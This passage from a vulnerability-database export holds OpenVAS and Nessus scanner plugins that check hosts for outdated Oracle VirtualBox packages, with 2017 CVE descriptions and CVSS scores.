Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSELeap42.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-desktop-icons\", rpm:\"virtualbox-guest-desktop-icons~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-host-source\", rpm:\"virtualbox-host-source~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"python-virtualbox\", rpm:\"python-virtualbox~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-virtualbox-debuginfo\", rpm:\"python-virtualbox-debuginfo~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox\", rpm:\"virtualbox~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-debuginfo\", rpm:\"virtualbox-debuginfo~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-debugsource\", rpm:\"virtualbox-debugsource~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-devel\", rpm:\"virtualbox-devel~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default\", rpm:\"virtualbox-guest-kmp-default~5.0.40_k4.1.39_53~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default-debuginfo\", rpm:\"virtualbox-guest-kmp-default-debuginfo~5.0.40_k4.1.39_53~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-tools\", rpm:\"virtualbox-guest-tools~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-tools-debuginfo\", rpm:\"virtualbox-guest-tools-debuginfo~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-x11\", rpm:\"virtualbox-guest-x11~5.0.40~40.1\", 
rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-x11-debuginfo\", rpm:\"virtualbox-guest-x11-debuginfo~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-host-kmp-default\", rpm:\"virtualbox-host-kmp-default~5.0.40_k4.1.39_53~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-host-kmp-default-debuginfo\", rpm:\"virtualbox-host-kmp-default-debuginfo~5.0.40_k4.1.39_53~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-qt\", rpm:\"virtualbox-qt~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-qt-debuginfo\", rpm:\"virtualbox-qt-debuginfo~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-websrv\", rpm:\"virtualbox-websrv~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-websrv-debuginfo\", rpm:\"virtualbox-websrv-debuginfo~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.3, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2019-07-17T14:21:16", "bulletinFamily": "scanner", "description": "This host is installed with Oracle VM\n VirtualBox and is prone to multiple unspecified vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2017-04-25T00:00:00", "id": "OPENVAS:1361412562310811008", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811008", "title": "Oracle Virtualbox Multiple Unspecified Vulnerabilities - 01 
Apr17 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle Virtualbox Multiple Unspecified Vulnerabilities - 01 Apr17 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:vm_virtualbox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811008\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2017-3561\", \"CVE-2017-3563\", \"CVE-2017-3576\", \"CVE-2017-3558\",\n \"CVE-2017-3587\", \"CVE-2017-3559\", \"CVE-2017-3575\", \"CVE-2017-3513\");\n script_bugtraq_id(97730, 97732, 97759, 97744, 97750, 97739, 97755, 97736);\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-04-25 15:06:13 +0530 (Tue, 25 Apr 2017)\");\n script_name(\"Oracle Virtualbox Multiple Unspecified Vulnerabilities - 01 Apr17 (Windows)\");\n\n script_tag(name:\"summary\", 
value:\"This host is installed with Oracle VM\n VirtualBox and is prone to multiple unspecified vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to multiple\n unspecified errors in the 'Core' and 'Shared Folder' sub-component of the\n application.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to have an impact on availability, confidentiality and integrity.\");\n\n script_tag(name:\"affected\", value:\"VirtualBox versions prior to 5.0.38\n and prior to 5.1.20 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Oracle VirtualBox 5.0.38 or 5.1.20 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_sun_virtualbox_detect_win.nasl\");\n script_mandatory_keys(\"Oracle/VirtualBox/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!virtualVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(virtualVer =~ \"^(5\\.0)\")\n{\n if(version_is_less(version:virtualVer, test_version:\"5.0.38\"))\n {\n fix = \"5.0.38\";\n VULN = TRUE;\n }\n}\n\nelse if(virtualVer =~ \"^(5\\.1)\")\n{\n if(version_is_less(version:virtualVer, test_version:\"5.1.20\"))\n {\n fix = \"5.1.20\";\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver( installed_version:virtualVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:19:08", "bulletinFamily": "scanner", 
"description": "This host is installed with Oracle VM\n VirtualBox and is prone to multiple unspecified vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2017-04-25T00:00:00", "id": "OPENVAS:1361412562310811009", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811009", "title": "Oracle Virtualbox Multiple Unspecified Vulnerabilities - 01 Apr17 (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle Virtualbox Multiple Unspecified Vulnerabilities - 01 Apr17 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:vm_virtualbox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811009\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2017-3561\", \"CVE-2017-3563\", \"CVE-2017-3576\", \"CVE-2017-3558\",\n \"CVE-2017-3587\", \"CVE-2017-3559\", \"CVE-2017-3575\", \"CVE-2017-3513\");\n script_bugtraq_id(97730, 97732, 97759, 97744, 97750, 97739, 97755, 97736);\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-04-25 15:12:24 +0530 (Tue, 25 Apr 2017)\");\n script_name(\"Oracle Virtualbox Multiple Unspecified Vulnerabilities - 01 Apr17 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Oracle VM\n VirtualBox and is prone to multiple unspecified vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to multiple\n unspecified errors in the 'Core' and 'Shared Folder' sub-component of the\n application.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to have an impact on availability, confidentiality and integrity.\");\n\n script_tag(name:\"affected\", value:\"VirtualBox versions prior to 5.0.38\n and prior to 5.1.20 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Oracle VirtualBox 5.0.38 or 5.1.20 or later.\");\n\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_oracle_virtualbox_detect_macosx.nasl\");\n script_mandatory_keys(\"Oracle/VirtualBox/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!virtualVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(virtualVer =~ \"^(5\\.0)\")\n{\n if(version_is_less(version:virtualVer, test_version:\"5.0.38\"))\n {\n fix = \"5.0.38\";\n VULN = TRUE;\n }\n}\n\nelse if(virtualVer =~ \"^(5\\.1)\")\n{\n if(version_is_less(version:virtualVer, test_version:\"5.1.20\"))\n {\n fix = \"5.1.20\";\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver( installed_version:virtualVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-11-01T03:01:52", "bulletinFamily": "scanner", "description": "This update to virtualbox 5.0.40 fixes the following issues :\n\nThese security issues were fixed (bsc#1034854) :\n\n - CVE-2017-3513: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Difficult to exploit vulnerability allows high\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized read access to a subset of\n Oracle VM VirtualBox accessible data.\n\n - CVE-2017-3538: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Shared\n Folder). 
Difficult to exploit vulnerability allows low\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data as well as unauthorized\n access to critical data or complete access to all Oracle\n VM VirtualBox accessible data.\n\n - CVE-2017-3558: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows unauthenticated\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a hang or\n frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox as well as unauthorized update, insert or\n delete access to some of Oracle VM VirtualBox accessible\n data and unauthorized read access to a subset of Oracle\n VM VirtualBox accessible data.\n\n - CVE-2017-3559: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. 
Successful attacks of this vulnerability can\n result in unauthorized ability to cause a hang or\n frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox as well as unauthorized update, insert or\n delete access to some of Oracle VM VirtualBox accessible\n data and unauthorized read access to a subset of Oracle\n VM VirtualBox accessible data.\n\n - CVE-2017-3561: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3563: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3575: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows high privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. 
Successful attacks of this vulnerability can\n result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete\n DOS) of Oracle VM VirtualBox.\n\n - CVE-2017-3576: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3587: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Shared\n Folder). Easily exploitable vulnerability allows low\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete\n DOS) of Oracle VM VirtualBox. 
These non-security issues\n were fixed :\n\n - Storage: fixed a potential hang under rare circumstances\n\n - Storage: fixed a potential crash under rare\n circumstances (asynchronous I/O disabled or during\n maintenance file operations like merging snapshots)\n\n - Storage: fixed a potential crash under rare\n circumstances (no asynchronous I/O or during maintenance\n file operations like merging snapshots)\n\n - Linux hosts: make the ALSA backend work again as well as\n Loading the GL libraries on certain hosts\n\n - GUI: don", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2017-534.NASL", "href": "https://www.tenable.com/plugins/nessus/99957", "published": "2017-05-03T00:00:00", "title": "openSUSE Security Update : virtualbox (openSUSE-2017-534)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-534.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99957);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/04/10 16:10:18\");\n\n script_cve_id(\"CVE-2017-3513\", \"CVE-2017-3538\", \"CVE-2017-3558\", \"CVE-2017-3559\", \"CVE-2017-3561\", \"CVE-2017-3563\", \"CVE-2017-3575\", \"CVE-2017-3576\", \"CVE-2017-3587\");\n\n script_name(english:\"openSUSE Security Update : virtualbox (openSUSE-2017-534)\");\n script_summary(english:\"Check for the openSUSE-2017-534 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update to virtualbox 5.0.40 fixes the following issues :\n\nThese security issues were fixed (bsc#1034854) :\n\n - CVE-2017-3513: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Difficult to exploit vulnerability allows 
high\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized read access to a subset of\n Oracle VM VirtualBox accessible data.\n\n - CVE-2017-3538: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Shared\n Folder). Difficult to exploit vulnerability allows low\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data as well as unauthorized\n access to critical data or complete access to all Oracle\n VM VirtualBox accessible data.\n\n - CVE-2017-3558: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows unauthenticated\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a hang or\n frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox as well as unauthorized update, insert or\n delete access to some of Oracle VM VirtualBox accessible\n data and unauthorized read access to a subset of Oracle\n VM VirtualBox accessible data.\n\n - CVE-2017-3559: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. 
Successful attacks of this vulnerability can\n result in unauthorized ability to cause a hang or\n frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox as well as unauthorized update, insert or\n delete access to some of Oracle VM VirtualBox accessible\n data and unauthorized read access to a subset of Oracle\n VM VirtualBox accessible data.\n\n - CVE-2017-3561: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3563: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3575: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows high privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. 
Successful attacks of this vulnerability can\n result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete\n DOS) of Oracle VM VirtualBox.\n\n - CVE-2017-3576: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3587: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Shared\n Folder). Easily exploitable vulnerability allows low\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete\n DOS) of Oracle VM VirtualBox. 
These non-security issues\n were fixed :\n\n - Storage: fixed a potential hang under rare circumstances\n\n - Storage: fixed a potential crash under rare\n circumstances (asynchronous I/O disabled or during\n maintenance file operations like merging snapshots)\n\n - Storage: fixed a potential crash under rare\n circumstances (no asynchronous I/O or during maintenance\n file operations like merging snapshots)\n\n - Linux hosts: make the ALSA backend work again as well as\n Loading the GL libraries on certain hosts\n\n - GUI: don't crash on restoring defaults in the appliance\n import dialog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1034854\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected virtualbox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-desktop-icons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"python-virtualbox-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"python-virtualbox-debuginfo-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-debuginfo-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-debugsource-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-devel-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-guest-desktop-icons-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-guest-kmp-default-5.0.40_k4.1.39_53-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-guest-kmp-default-debuginfo-5.0.40_k4.1.39_53-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-guest-tools-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", 
